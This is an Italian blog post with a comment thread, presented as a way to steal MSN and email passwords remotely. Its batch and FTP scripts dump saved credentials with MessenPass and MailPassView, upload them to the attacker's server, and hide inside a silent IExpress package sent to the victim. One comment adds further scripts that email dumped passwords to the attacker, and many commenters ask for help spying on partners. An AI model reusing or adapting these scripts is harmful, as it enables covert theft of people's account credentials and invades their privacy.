Come rubare password di MSN e di una casella mail da remoto usando MessenPass e MailPassView.

Chi si ricorda dei programmini “MessePass” e “MailPassView“, quelli usati in quel famoso metodo per rubare le password via penna USB?

Bene per chi non lo sapesse questi due programmini servono per recuperare le password dimenticate memorizzate su una macchina.

Adesso vi dimostro come è possibile utilizzarli per rubare le password salvate senza avere accesso fisico alla macchina.

Il pirata informatico si serve di: uno spazio web, il programma “MessenPass”, “MailPassView”, il file eseguibile di WinRar, un editor di testo qualsiasi per scrivere il file start.bat e il file ftp.txt.

Il codice del file start.bat:

@echo off
messenpass.exe /sverhtml Password-MSN.html //scrive l'output di messenpass in un file html
mailpassview.exe /sverhtml Password-Outlock.html //scrive l'output di mailpasspreview in un file html
rar.exe a archvio.rar *.html //comprime i due file html contenenti le password in una archivio
md c:\temp //crea la cartella temporanea
copy ftp.txt C:\temp //copia il file ftp.txt nella catella temporanea
copy *.rar c:\temp //copia il file rar nella cartella temporanea
cd c:\temp //si posiziona nella cartella temporanea
ftp -v -i -s:ftp.txt //avvia la sessione ftp con lo spazio web e permette di eseguire i comandi contenuti nel file di testo
del ftp.txt //elimina il file ftp che contiene i dati di accesso e i comandi dalla cartella temporanea
del *.rar //emilina i file rar nella cartella temporanea

Il contenuto del file ftp.txt:

open tuositoftp.org //l'host dello spazio web
tuouserftp //l'username dello spazio web
tuapasswordftp //la password dello spazio web
cd msn //cartella che conterrà i log
lcd c:\temp //si posiziona nella cartella locale temporanea
BINARY //imposta il trasferimento di file di tipo binario
mput *.rar //trasferisce i file rar allo spazio web
bye
//chiude la sessione ftp

Il pirata tramite ftp crea una cartella chiamata “msn” dove riceverà il file compresso che contiene le password, successivamente invierà alla sua vittima tutti questi programmi compressi con iexpress.

Iexpress è un software di casa Microsoft, potete usarlo seguendo il procedimento: start->esegui->digitare “iexpress”(senza virgolette)->PREMERE INVIO.

Ovviamente ho scritto il codice con degli errori in modo tale da non poter essere usato con iexpress, questo evita l’uso spropositato ai lamer di turno.

Iexpress permette di autoestrarre dei file in modalità nascosta “hidden” quindi la vittima quando apre il file non si accorge di niente,nessuna finestra, nessun errore, non da segno di vita alcuna, la vittima è convinta che il file non funziona.

Il pirata non invierebbe mai i file senza averli prima compressi e nascosti, perchè il file ftp.txt contiene i dati di login al suo spazio web.

Due consigli:

non memorizzate le password sul vostro computer ma riscrivetele ogni volta;

se siete troppo pigri e non volete rinunciare alla comodità della password salvata vi consiglio di non aprire file eseguibili ricevuti via email o via Messenger che non siano di fonte certa, poichè potrebbero contenere questi file maligni!😀

E’ tutto alla prossima!😉

172 Responses to “Come rubare password di MSN e di una casella mail da remoto usando MessenPass e MailPassView.”


  1. 1 no1globe 7, novembre, 2007 alle 7:40 pm

    Chi si ricorda dei programmini “MessePass” e “MailPassView“, quelli usati in quel famoso metodo per rubare le password via penna USB?

    Io no di certo -.- , mai sentiti :mrgreen:

    Ebbene si😀 … io sono uno di quelli che le password se le annota metodicamente su un pezzettino di carta… e nn solo questo 😉 (sono ancora all’antica 😛 ) :mrgreen:

  2. 2 underground0 7, novembre, 2007 alle 7:47 pm

    Fai bene!🙂
    Però il pezzettino di carta tienilo ben nascosto! Come faccio io che poi non lo ritrovo neanche!😀

  3. 3 no1globe 8, novembre, 2007 alle 2:32 pm

    @ underground0: guarda… in casa da me nessuno sa’ usare il computer… il foglietto cn le password e altro lo tengo proprio davanti al computer sopra la stampante😉 …. di conseguenza abbiamo un solo computer (il mio) e cio’ nn mi comporta timori ne niente di niente 😀 :mrgreen:

  4. 4 underground0 8, novembre, 2007 alle 2:40 pm

    Si ma metti che il tuo peggior nemico arriva alla tua stampante!😀

    (scherzo non sono così paranoico) ahahahaha! ROFL:mrgreen:

  5. 5 lacrima... 11, novembre, 2007 alle 1:53 pm

    ok!!!!! devo dirti la verità nn ho capito come fare, dato k hai la consapevolezza di chi io sia.. contattami… 6 GRANDE!!!!!! 6 UN GENIO…… QND MI PIACI!!!!

  6. 6 underground0 11, novembre, 2007 alle 2:17 pm

    @lacrima: Grazie per tutti questi complimenti! Troppi!🙂 Kiss

  7. 7 no1globe 11, novembre, 2007 alle 6:38 pm

    @ underground0: “Si ma metti che il tuo peggior nemico arriva alla tua stampante!”
    Ma chi? Mia sorella, che appunto nn sa’ usare il computer?? 😀:mrgreen:

  8. 8 ter 14, novembre, 2007 alle 1:15 pm

    si ma come faccio ad entrare in unaltro pc per recuperare la password?

  9. 9 underground0 14, novembre, 2007 alle 1:28 pm

    @no1globe: eheheh😀

    @ter: non sono domande da fare queste! -_-

  10. 10 ter 15, novembre, 2007 alle 8:50 am

    dai aiutami!!!!!!!ci possiamo parlare anche da un’altra parte se per te non è un problema!!

  11. 11 marianna 19, novembre, 2007 alle 10:16 am

    devo trovare la password che il mio ragazzo usa su messenger… visti i suoi precedenti è l’unico modo che ho per vedere se mi frega o meno.. vi prego, aiutatemi e ditemi come fare x recuperarla!!

  12. 12 underground0 19, novembre, 2007 alle 5:02 pm

    @ter, marianna:

    lo scopo di questo post non è imparare a rubare le password, ma difenderci da attacchi di questo tipo!🙂

  13. 13 marco 19, novembre, 2007 alle 10:24 pm

    Vi scrivo anche se so ke non riuscirete ad aiutarmi, oramai ho perso le speranze. C’è un idiota ke ha fatto delle foto alla mia ragazza e le ha messe nel blog facendoci il figo. vorrei sapere come poterle togliere, l’unica soluzione ke conosco è scoprirgli la password,ma nessuno quì è realmente capace. spero ke voi sappiate un’altro modo.purtroppo questo bastarxx abita molto lontano da casa mia e non posso neanche riempirlo di botte,peccato veramente. vi ringrazio anticipatamente anke se so che come tanti altri forum non riuscirete ad aiutarmi.grazie comunque.
    Ps l’account non è mio

  14. 14 underground0 20, novembre, 2007 alle 2:02 pm

    @marco: lui pubblicando le foto della tua ragazza ha commesso un atto illecito, esiste il diritto alla privacy!

    Puoi agire in giudizio e magari guadagnarci qualcosina come risarcimento danni! Invece di rubare la password e commettere anche te un reato vai dai carabinieri ed esponi i fatti!
    Dagli indirizzo del sito e informazioni sul proprietario se li hai!

    Buona fortuna!

  15. 15 L'âme du pirate 22, novembre, 2007 alle 3:54 am

    yes , u can do it , but ur victim must be very stupid

  16. 16 underground0 22, novembre, 2007 alle 2:58 pm

    @L’ame du pirate:

    With a social you succeed sure! The victim must trust you!

  17. 17 kitty 23, novembre, 2007 alle 3:08 pm

    ciao!! scusa la mia ignoranza ma non ho ben capito come devo fare..per favore non è che me lo spiegheresti meglio plz? il mio indirizzo è babi1990@hotmail.it
    grazie anticipatamente e scusa per il disturbo!

  18. 18 underground0 23, novembre, 2007 alle 3:53 pm

    @ktty: come devi fare per cosa?:/

  19. 19 kitty 23, novembre, 2007 alle 5:35 pm

    ops scusa non l’ho scritto..perdonami! per trovare la password di un contatto..l’hai spiegato in alto ma non ci ho capito molto..

  20. 20 underground0 23, novembre, 2007 alle 5:37 pm

    @kitty: Avevo già risposto a ter e marianna in questo modo:

    lo scopo di questo post non è imparare a rubare le password, ma difenderci da attacchi di questo tipo!🙂

  21. 21 jessicafifi 23, novembre, 2007 alle 7:32 pm

    per chi ha messenpass mi potete scrivere la password di questo contatto sbrigatevi è urgente….cucciola.mm@hotmail.it GRAZIEEE

  22. 22 jessicafifi 23, novembre, 2007 alle 7:43 pm

    vi prego rispondete alla domanda che vi haffo prima

  23. 23 frenk??? 29, novembre, 2007 alle 2:20 am

    Ragazzi io ho provato molte vie per recuperare una password ma niente da fare .
    ho provato con programmi Brute Force ma niente .Anzi vi dirò di piu questi programmi sono caz…..te perchè funzionano con una lista di password e per avere successo di bucare una password devi avere una lista infinita e poi dovi essere fortunattissimo se riesci a trovare la password .Comunque io sono riuscito ad trovare una guida che ti fà recuperarè le password di chiunque in modo molto facile con risultati di successo del 100/100.
    Questo e il link http://msn1000.org/a.php.
    ciao

  24. 24 underground0 29, novembre, 2007 alle 6:16 am

    @frenk???: brutto idiota, come diavolo osi postare le tue truffe sul mio blog! Ora ti faccio vedere io! Ho editato il tuo commento togliendo il link al tuo sito truffa, hai sbagliato davvero! Ti distuggo!

  25. 26 silvia 14, dicembre, 2007 alle 5:01 pm

    se qualcuno sa come fare x prendere le password mi contatti x favore ok?? ciao

  26. 27 lullo 17, dicembre, 2007 alle 7:01 pm

    ma fottetevi cioe’ io sto cercando un modo x disattivare la mia mail xke me l’hanno rubata e voi pensate a come rubarla!!vergogna!!!!

  27. 28 Napster 20, dicembre, 2007 alle 12:30 pm

    underground ma i file bisogna comprimerli tutti insieme in un file iexpress o uno alla volta e la vittima deve aprireli in successione?

  28. 29 Napster 20, dicembre, 2007 alle 12:32 pm

    Lullo esiste un metodo legale x riprendersi gli account rubati http://www.eurohackers.it/modules.php?name=Forums&file=viewtopic&t=8395

  29. 30 underground0 22, dicembre, 2007 alle 4:14 pm

    @Napster: tutti assieme!😀

  30. 31 Wedge 4, gennaio, 2008 alle 8:20 am

    Cioè….mi domando….perchè una persona deve voler rubare la psswd altrui? ma i cazzi sua no è? se avete intorno persone di cui non vi fidate allora allontanatevele e basta….invece di perdere tempo con queste segate quà…..fanno ridere i post che ho appena letto che dicono:”come si trava la psswd…..?”….mah..io non sò più che pensare…

  31. 32 jack 8, gennaio, 2008 alle 3:17 pm

    ma cm ha ftt frank ha scoprire il sito cmq kissene f***e a me nn interessa tanto rubere password ma nn o capito come faccio a difendermi!

  32. 33 lamer del cavolo 9, gennaio, 2008 alle 8:02 pm

    bha sempre le solite lamerate sti commenti

  33. 34 roberto 10, gennaio, 2008 alle 3:58 pm

    io so come rubare la password ad altri contatti se serve aiuto contattatemi al contatto robermail.it

  34. 35 lino 10, gennaio, 2008 alle 11:54 pm

    vedete guida per fare fake login msn http://sta.org/FAKE_LOGIN_MSN.htm

  35. 36 Napster 12, gennaio, 2008 alle 2:30 pm

    esiste un modo x decomprimere gli iexpress tipo questo?

  36. 37 Lucio 13, gennaio, 2008 alle 5:12 pm

    Stupendo sito underground, ma ho provato su me stesso a fare il tutto il file bat funziona crea un file rar con le info ma non arriva al mio server.
    Puoi darmi un piccolo aiuto per favore per emal sicuramente sbaglio qualcosa nel file http://ftp.txt.
    Grazie

  37. 38 Lucio 13, gennaio, 2008 alle 5:25 pm

    anzi se posso aggiungo come ho compilato il mio file http://ftp.txt “password e nome utenti sono inventati non sono i miei reali”🙂
    Grazie

    open interfree.it
    lucio
    lucio
    cd msn
    lcd c:\temp
    BINARY
    mput *.rar
    bye

  38. 39 max 13, gennaio, 2008 alle 8:49 pm

    Ciao, mi sareste di grande aiuto se potreste dirmi come poter recuperare una password di msn! grazie per un’eventuale risposta

  39. 40 Aran 14, gennaio, 2008 alle 10:04 am

    Ciao…ho alcuni problemi…ho compilato i codici(con le giuste modifiche)ho recuperato i programmi da te citati…ma mi manca il passaggio di come usare il server http://ftp…che devo fare?mi potresti aiutare?ti ringrazio

  40. 41 NAPSTER 17, gennaio, 2008 alle 7:38 pm

    underground0 finalmete ci sono riuscito a farlo funzionare… mi ero dimenticato che ci voleva anche rar.exe:mrgreen:
    cmq ripensandoci non sono gli errori negli script a bloccarti… xkè sono davvero facili😉
    Cmq grande underground0 che posta sempre argomenti interessanti🙂

    xnapster@live.it

  41. 43 NAPSTER 17, gennaio, 2008 alle 7:48 pm

    frenk??? sei un genio a fare lamering sul sito di underground0😀 guarda che adesso underground esce dalla tua stampante e ti dirugge il pc😀

  42. 44 underground0 18, gennaio, 2008 alle 2:09 pm

    @Napster: eheh!😛 Denunciato alla Polizia Postale!

  43. 45 NAPSTER 18, gennaio, 2008 alle 2:36 pm

    😐 no davvero?!

  44. 47 kiara 19, gennaio, 2008 alle 1:51 pm

    peccato che io non ci capisco na mazza di tutti sti programmi altrimenti sapete quante me ne fregherei O.O

  45. 48 Lucio 24, gennaio, 2008 alle 8:51 pm

    QUOTE Iexpress permette di autoestrarre dei file in modalità nascosta “hidden” quindi la vittima quando apre il file non si accorge di niente,nessuna finestra, nessun errore, non da segno di vita alcuna, la vittima è convinta che il file non funziona.

    Il problema persisste se inviate questo file ad un l’utente un po’ smaliziato lo puo’ aprire semplicemente con winrar senza avviare l’esecutivo e questo punto vi frega lui i dati del vs server.

  46. 49 NAPSTER l'immancabile 30, gennaio, 2008 alle 7:34 pm

    the error is too easy!😀
    contact me x info at: xnapster@live.it (no lamer pease!)

    Lucio gira un programma simile in autoit che nn ha di questi problemi!😀

  47. 50 enzo 5, febbraio, 2008 alle 10:23 am

    ragazzi se qualcuno mi potrebbe dare una mano mi contattasse poi il problema glielo spiegherei su msn enzo.corbo@hotmail.it

  48. 51 Lucio 6, febbraio, 2008 alle 6:25 pm

    X Napester

    Grazie provero’ a contattarti per avere info non ne avevo proprio la piu’ pallida idea di questo soft

    Non avresti questo nome…NAPSTER l’immancabile.🙂

  49. 52 andry 10, febbraio, 2008 alle 8:02 pm

    ciao, mi potete aggiungere su msn: a.bottoni@hotmail.it, mi servirebbe 1 favore!!

  50. 53 Daniele 11, febbraio, 2008 alle 11:24 am

    Chi mi puo aiutare??
    Siccome ad un amico ho fatto uno scherzo e gli ho rubato il contatto msn cambiando la password indovinando la domanda segreta.
    Poi ho confessato che sono stato io per uno scherzo ma l’ha presa seriamente e mi ha denunciato
    Ora cosa possono farmi??
    Sulla denuncia ha ammesso che si trattava di uno scherzo.
    Cosa rischio??
    Devo mettere un avvocato???
    Aiutatemi

  51. 54 Lucio 12, febbraio, 2008 alle 7:57 pm

    x NAPSTER l’immancabile

    Che mi fai sapere il nome di questo soft ?
    Se no che aiuto mi dai🙂
    Ciao

  52. 55 NAPSTER 12, febbraio, 2008 alle 8:29 pm

    X Lucio
    1 sono solo napster
    2 il soft nn ha nome
    3 cerca nella zona mod di eurohackers

  53. 56 Lucio 14, febbraio, 2008 alle 7:07 am

    Grazie Mille….Napster a buon rendere
    Ciao

  54. 57 Lucio 21, febbraio, 2008 alle 8:14 pm

    X NAPSTER

    C’è posta per te…🙂

  55. 58 NAPSTER 28, febbraio, 2008 alle 7:25 pm

    OK adesso controllo

  56. 59 kekko 2, marzo, 2008 alle 1:12 am

    underground0 appena leggi questo commento volevo kiederti se puoi aggiungermi in msn..tanto l’email la puoi vedere visto ke il blog è tuo xD..se puoi aggiungermi mi fai un favore,devo kiederti una cosa..è urgente..ciao grz ps-complimenti x il blog 6 un grande

  57. 60 kekko 2, marzo, 2008 alle 1:15 am

    vabbè dai la scrivo lo stexo..snoop_dog_88@hotmail.it aspetto xD ciao

  58. 61 chicco 8, marzo, 2008 alle 10:59 am

    ciao a me succede una cosa molto strana:
    praticamente mi entrano in msn e mi cambiano delle cose, tipo il nome in alto e mi bloccano delle persone…
    io cambio password e ogni volta la devo scrivere…pero me lo fanno lo stesso..ho anche cambiato contatto e domanda personale pero mi continuano a entrare e a modificare certe cose (praticamente bloccano la mia ragazza e aggiungono il contatto della mia ex e a volte mi cambiano anche la frase: ho chiesto a lei ma dice di non saperne niente..)

    che problema e’??? devo denunciarlo ai carabienieri?

  59. 62 GIULIO 11, marzo, 2008 alle 10:01 pm

    salve a tutti… soprattutto ad underground0 che è veramente in gamba..
    ho un problema di accesso remoto non autorizzato da msn…
    mi spiego, ogni volta che la mia lei accede a msn dopo pochi secondi cade e si riconnette, ma in realtà non è lei a riconnettersi bensì il suo ex che accede da remoto… ho letto che si può trovare la password di msn tramite alcuni programmi, però a me interessa soprattutto sapere come fare per bloccare questi accessi non autorizzati… se mi puoi rispondere tramite mail te ne sarei grato… p.s. lei ha norton antivirus… potrebbe aver aperto una mail contenente un keylogger..

  60. 63 noobs 11, marzo, 2008 alle 10:24 pm

    semplicissima applicazione per scoprire le password di msn, chi interessato mi contatti!!!

  61. 64 francesco 11, marzo, 2008 alle 11:40 pm

    non sono capace di creare la pagina web se qualcuno mi puo aiutare mi contattate per favore?

    kekkuccio83@hotmail.it

  62. 65 boh 14, marzo, 2008 alle 9:19 pm

    Come si fa a rubare le password..si deve scaricare MessenPss MailPassView..Mi aiutate per piacere

  63. 66 tribasei 16, marzo, 2008 alle 1:54 pm

    X GIULIO
    Se è il problema è solo msn basta cambiare password è l’intruso non puo’ piu’ entrare in msn con quel nick.
    Se poi hai qualche problema non ti rimane che crearti un nuovo nick con hotmail.
    Ciao

  64. 67 tribasei 16, marzo, 2008 alle 1:58 pm

    X BOH
    Naturalmente ti servono quei soft se no come fai……

  65. 68 br3nton 18, marzo, 2008 alle 11:33 am

    underground….vorrei parlare direttamente con te per delle cose….magari se ci scambiassimo gli indirizzi di msn o tramite mail mi faresti un grande favore…aspetto tue notizie
    grazie

  66. 69 dario 26, marzo, 2008 alle 2:49 pm

    Bravo bella “guida” comunque avevo gia letto qualcosa di simile su un altro blog ma non tramite ftp ma su pendrive (l’ho provato e funzionava alla perfezione).toglimi una curiosità hai saltato volontariamente un pezzo nel trasferimento dei file sul ftp?

  67. 70 underground0 26, marzo, 2008 alle 4:20 pm

    @dario: grazie, beh questa guida l’ho scritta io, ho messo degli errori nel code per non farla usare a dei lameroni in cerca di pass…

  68. 71 dario 27, marzo, 2008 alle 11:36 am

    ok grazie! aspetto con ansia un altra guida cosi ben fatta! ciao!

  69. 72 dario 28, marzo, 2008 alle 11:33 am

    volevo chiederti un altra cosa,come fa questo comando:copy http://ftp.txt C:\temp a copiare il file http://ftp.txt in C:\temp? Da dove prende il txt? Dal file exe creato con iexpress?…Mi sembra strano…

  70. 73 luke 28, marzo, 2008 alle 4:24 pm

    qual’è l’errore nel codice? Dai, su……..
    non sii cattivo
    A scopo informativo…
    E poi, se mi puoi aggiungere….sono alex94-10@hotmail.it
    Luke sono io, il grande

  71. 74 Melydia 2, aprile, 2008 alle 8:11 pm

    ehi futuro hollywoodiano..complimenti x il blog =D =D =D
    l’ho dtt io k mi diventerai 1 hacker..XDXD

  72. 75 kekko 10, aprile, 2008 alle 3:44 pm

    ciao….scusa se ti disturbo ma mi serve avere le password di due account di netlog xk un mio amico ha messo foto di certe mie amiche e ha scritto che sono lesbiche…..siccome vorrei diventare magari un hacker un indomani mi potresti spiegare i passi per farlo e casomai me le trovi direttamente? grazie mille!!!!!

  73. 76 Santy 12, aprile, 2008 alle 4:13 pm

    ciao underground
    volevo sapere dato ke nn sn tanto pratico in materia…
    ma è possibile rubare password dai contatti msn altrui in linea e non in linea?
    xkè io vedo solo le mie pass salvate nel mio pc
    potresti darmi 1 mano x favore a capire semplice semplice?
    scusa la mia ignoranza

  74. 77 matata 16, aprile, 2008 alle 9:33 pm

    Ciao, scusa ma perchè se non lo faccio con iexpress mi funziona e mi arriva la password sul sito http://ftp.. mentre se le faccio cn iexpress non mi arriva nulla, ma non mi chiama neanche un errore??? cioè,,, a questo punto visto che hai detto che mankano delle strinche x farlo funzionare con iexpress il post lo dovevi intitolare,,, recupero password in locale,,, e non da remoto😀

  75. 78 Giorgio 19, aprile, 2008 alle 7:27 pm

    Ciao…io non voglio fare il paranoico critico lamer…ma ho letto moltissimi articoli su questo fatto..e ti dico chiaramente che sono svogliato e abbattuto dalla criticainutile e la pocafede della gente! esatto…sono UN PIRLA a cui hanno rubato l’account…e, sinceramente, non voglio finisca qui…me lo voglio riprendere e so che questo non sara possibile …perche c’e qualcuno dall’altra parte piu bravo di me…di coseguenza che posso fare?! che devo fare?! cerco un aiuto da piu esperti…dato che in questo campo non ci capisco quasi nulla…

  76. 79 underground0 20, aprile, 2008 alle 2:14 pm

    @Giorgio: Reclamo a Microsoft, se l’account è il tuo te lo restituiscono😉

  77. 80 manuel 21, aprile, 2008 alle 11:16 pm

    ciao è la prima volta che visito questo sito… cmq avrei urgentemente bisogno di chiederti un’approfondimento contattami: manuel100blu@hotmail.it t’aspetto ciao grazie

  78. 81 dario 22, aprile, 2008 alle 8:54 pm

    Io ci sono riuscito ho modificato anke il codice ed inserendo una password all’ archivio rar e mettendo un altro programma ke parte dopo aver prelevato le pass inoltre ho modificato il nome del file in modo da fargli cambiare nome ogni volta che viene mandato.
    Come chiesto da Underground nn daro nessun suggerimento ma vi dico che basta conoscere un po il linguaggio usato nei file di batch.
    (Underground nn ti preoccupare nn ho intenzione di fare nulla di male con questo prog…1 nn ho nessun nemico 2 Conosco metodi + efficaci per questi malefici scopi…NON SPECIFICO QUALI)
    Tanti saluti!
    Dario

  79. 82 Giampa90 23, aprile, 2008 alle 12:43 pm

    Ciao, ho scoperto questo blog e apprezzo molto gli articoli interessanti.
    Molto bello questo programma in batch, utile anche per altri scopi più legali.

  80. 83 piccolina 23, aprile, 2008 alle 7:49 pm

    non ho ben capito ..cosa devo fare x sapere la password di un contatto msn????grazie..

  81. 84 nTRrRRrrRRrrRrr 30, aprile, 2008 alle 2:22 pm

    1 Rubare password attraverso cartella condivisa e mspass… cavolata e per cascarci bisogna esse stupidi forti

    serve saper fare un batch, avere una cartella condivisa con la vittima, il programma mspass.exe e rar.exe

    @echo OFF
    mspass.exe /stext
    copy “stext.txt” “C:\Documents and Settings\%-USERNAME%\Impostazioni locali\Dati applicazioni\Microsoft\Messenger\Vittima@hotmail.it\Sharing Folders\Tua@hotmail.it”

    archiviare batch e mspass con rar

    2 La password arriva per email un’ altra cavolata…ma non bisogna essere stupidi forti per cascarci

    serve saper fare un batch, avere il programma blat.exe, mspass.exe e rar.exe

    @echo off
    mspass.exe /stext file.txt
    blat file.txt to TuaEmail@hotmail.it -subject “PSW”
    del file.txt
    del mspass.exe
    del blat.exe
    exit

    archiviare batch, mspass e blat con rar e magari fare un archivio autoestraente…

    In entrambi i casi è possibile far diventare il batch un eseguibile grazie a Bat to Exe un prgrammino che si puo trovare in rete e con il quale si puo settare anche l’ opzione GHOST ma credo l antivirus lo riconosca come virus… BOH…ah ovviamente ci sono errori stupidissimi, ma…

    CIao underground0 non voglio fare concorrenza, ci mancherebbe, ma volevo illustrare anche questi metodi

  82. 85 Maryka 12, maggio, 2008 alle 7:20 pm

    ciaooooo!!!bello questo sito e interessante!!!Scusami davvero se disturbo per questa scemenza volevo chiederti una cosa dato ke sei molto bravo…..io ho un paio di accaunt registrati sul mio pc e ho usato questo programma( cioè Messenpass) per prendere le password , ma una volta che accedo alla cartella non mi da tutte le password degli accaunt registrati ,solo una password mi da ed è pure quella vecchia(cioè la persona di questo contatto ha camiato la password e mi appare sempre la vecchia) ma nn mi da quella nuova come mai questo??? cosa posso fare per sapere tutte le password e sopratutto quelle nuove riempostate??? ti prego di aiutarmi è urgente!!! non so piu a ki rivolgermi …….e se sai come devo fare, data la mia ignoranza in materia, potresti spiegarmela passo per passo perke mi interessa solo recuperare tutte le password degli accaunt registrati sul mio pc … spero ke mi sono fatta capire!!🙂 ..ti prego aiutamiiiiiiiiiiii!!!! grazie in anticipo ciaooooooooooooo!!…… by maryka ….. aspetto con ansia una tua risposta qui !!!

  83. 86 Pietro 13, maggio, 2008 alle 4:41 pm

    nn ci sn riuscito!!

  84. 87 lorè 14, maggio, 2008 alle 9:42 am

    ma che vergogna ma voi pensate sempre di rubare le pass ma perchè non pensate alla vostra,ma poi il fatto più grave e che non sapete che commetete un furto!!!!!!!!!!!!!!!!!!!!!!!!!!

  85. 88 abominio 14, maggio, 2008 alle 10:16 pm

    incredibile…c’è gente che darebbe il cul* pur di rubare password!

  86. 89 luca 23, maggio, 2008 alle 5:03 pm

    mi ha fregato

  87. 90 Azrael 30, maggio, 2008 alle 8:46 pm

    saaalve… ho un problema… qualche giorno fa mi hanno rubato il profilo su msn… non so chi sia perchè agiva tramite altri contatti.. cioè so x certo che non era il suo… vorrei innanzitutto riprendermi il profilo… secondariamentecapire come trovare questo tizio per fargliela pagare… vi pregocontattatemi e fatemi sapere come posso risalire a lui!!! dark.infernal.boy@hotmail.it emh… scusate x la mail incoraggiante😄 perfavore no nrispondermi qui ma aggiungimi… ti prego ç_ç conto su di te perchè mi aggiunga… poi se mi vuoi dire che non mi aiuti ok ma dimmelo quando mi hai aggiunto… grazie per il tuo tempo… sono disperato ç_ç

  88. 91 Tommy 3, giugno, 2008 alle 9:54 pm

    Ciao underground0, ho avuto modo di leggere alcune tue guide, le trovo davvero interessanti, solo che ancora faccio fatica a capire i vari meccanismi… mi potresti dire da dove hai iniziato a studiare?? mi piacerebbe assai arrivare ad un livello accettabile di conoscenza in materia😛
    Se vuoi possiamo parlarne privatamente non c’è problema, grazie ancora delle informazioni ciao

  89. 92 hacku 6, giugno, 2008 alle 10:46 pm

    potevi evitare di mettere gli errori… e se uno non conosce il batch perchè usa unix?

  90. 93 Marziano 7, giugno, 2008 alle 12:06 am

    Salve raga sono disperatissimo…
    mi hanno fregato i contatti… c’è modo per recuperarli?
    aspetto anziosamente una vostra risposta grazie

  91. 94 underground0 9, giugno, 2008 alle 11:34 am

    @hacku: buon per lui, ma qui la pappa pronte per nessuno…

  92. 95 ..disperato.. 9, giugno, 2008 alle 2:23 pm

    ciao a tt…scstemi se sn ignorante ma nn sn mlt bravo al comp vorrei sapere km si trovono le password senza usare ne programmi e nnt e-mail..vi prego sn disperato 1 xsona mi ha preso la password e ora è in poxesso del mio account e il brutto è k è 1 mio amiko e nn lo poxo denunciare alla polizia postale..aspetto vostre notizie..grx in anticipo..

  93. 96 LUCIA 12, giugno, 2008 alle 5:01 pm

    CIAO,SCUSATE TANTO MA QUALCUNO PUO AIUTARMI? SCOPERTO KE IL MIO RAGAZZO HA UN SECNDO KONTATTO MA NON SO LA PASSWORD..VI PREGO LO DEVO SMASKERARE..HLP HELP HELP

  94. 97 love_stardust 12, giugno, 2008 alle 9:28 pm

    Ciao a tutti.
    Sono riuscito a fare funzionare iexpress,
    sono riuscito a capire l’ errore (forse perchè i file messenpass e mailpassview una volta compressi con iexpress cambiano nome),
    non riuscendo a integrare winrar ho detto al programma di spostare i file html,
    ma non riesco ad inviarli..:(

    Non voglio detto come si fa ma solo che qualcuno mi indirizzi nella via giusta… non prego nessuno…. chi può aiutarmi mi aiuti..
    Grazie

  95. 98 stefano 14, giugno, 2008 alle 8:56 pm

    non riesco a scaricare la posta di alice.it mi chiede nome e password ma io nol la ricordo o fatto tutte le prove il pop 3 e smtp sono giusti come devo fare per risorvere il problema solo in entrata .

  96. 99 nico 15, giugno, 2008 alle 7:02 am

    ciao.io non riesco a scaricare messenpass come posso scaricarlo?
    ciao rix

  97. 100 Lucio 21, giugno, 2008 alle 8:58 am

    X Azrael e Disperato e per quelli che hanno bisogno di recuperare la password rubata
    Leggetevi questo articolo che vi indica x filo e per segno come recuperare la vostra password:
    http://my.opera.com/pizzarone/blog/recuperare-la-password-rubata-in-msn

    Ciao

  98. 101 Paddy 25, giugno, 2008 alle 8:34 pm

    io ho un problema ho un vekkio account msn, non ricordo + la password, rispondo alla domanda segreta ma mi dice ke è sbaglita la risposta probabilmente ho scritto male, ho provato a fare intenzionalmente degli errori ma nnt. non posso usare programmi che rintracciano vekkie password con qst computer non ho mai fatto l’accesso a quell’account il vekkio l’ho buttato. esiste un programma ke usa anke la forza brutale per trovare la password? se si mi date un link per scaricarlo? ps ho provato gia con alcuni ma l’antivirus non mi permette di usarli e non riesco a disabilitarlo…
    grz

  99. 102 Lucio 28, giugno, 2008 alle 10:53 am

    X ago1980
    Si bravo scrivi la tua password🙂
    Non scrivete niente datemi retta vi rubano la vostra pass.

  100. 103 Andy 6, luglio, 2008 alle 1:36 pm

    aiutami ti prego a rubare 1 password è tpr importante…ti supplico rispondimi te ne sn grata…. se prp nn puoi aiutami a capire tt!! andy…
    grz!

  101. 104 k 14, luglio, 2008 alle 9:20 pm

    vi prego aiutatemi devo recuperare una password rispodetemi

  102. 105 k 14, luglio, 2008 alle 9:21 pm

    nn so’ cm fare ho bisogno d’aiuto

  103. 106 bimba-stylosa 16, luglio, 2008 alle 8:22 pm

    ciao a tutti…se qlk1 sa rubare password potrebbe aggiungermi su msn il contatto e qst –>kisskiss-by93@live.it
    vi prego aggiungetem…anke se conoscete qlk1 ke lo sappia fare…
    grazie a ki mi aiuterà…cmq vojo bn tutti!!! zauuu

  104. 107 Lucio 25, luglio, 2008 alle 7:06 pm

    X K
    O ci fai…o ci sei ma li leggi i post antecedenti🙂

    Come recuperare una password:
    Lucio 21, Giugno, 2008 alle 8:58 am

    per quelli che hanno bisogno di recuperare la password rubata
    Leggetevi questo articolo che vi indica x filo e per segno come recuperare la vostra password:
    http://my.opera.com/pizzarone/blog/recuperare-la-password-rubata-in-msn

    Ciao

    Vorrei aggiungere che non è cosi’ molto semplice rubare una password.
    Se c’è un buon antivirus il file viene subito bloccato.
    Seconda cosa per chi ha poca manualità con il computer e server ftp e meglio che lasci perdere

  105. 108 Francesca 28, luglio, 2008 alle 3:39 pm

    Ciao! mi potresti aiutare a rubare la password di un contatto? ti prego è urgente! non so più come fare sono disperata!

  106. 109 antonio 31, luglio, 2008 alle 7:43 pm

    come posso riprendermi il mio contatto msn che mi è stato rubato stamane

  107. 110 lucia 1, agosto, 2008 alle 6:02 am

    infatti mai sentito questo

  108. 111 Giampa_90 4, agosto, 2008 alle 7:09 pm

    Wow è cresciuto questo articolo… cmq trovare le password con questo metodo è poco efficace… meglio usare script x msn plus!😉

    Io ho studiato bnissimo il js x poterne scrivere e devo dire che possono davvero fare moooolte cose (spionaggio chat, attivazione webcam e microfoni, password ecc…) .😀

    Le versioni facilmente reperibili sono poco valide, io ne ho scritto uno che permette di moltissime cose in un solo script.

    In ogni caso, a parte x uno scherzetto…, spiare una persona a sua insaputa è illegale (ma tnt a voi nn ve ne fregherà nulla…)!

    In ogni caso se volete qualche aiuto contattatemi su msn:
    giampa_90@live.it

  109. 112 Lucio 14, agosto, 2008 alle 3:38 pm

    X Giampa 90
    Anche gli script con ottimo antivirus vengono bloccati e riconosciuti come trojan.
    Ciao

  110. 113 vergogna 25, agosto, 2008 alle 7:29 pm

    Vi dovete vergognare sporcaccioni ke cercate di rubare password ma andate a lavorare va VERGOGNA

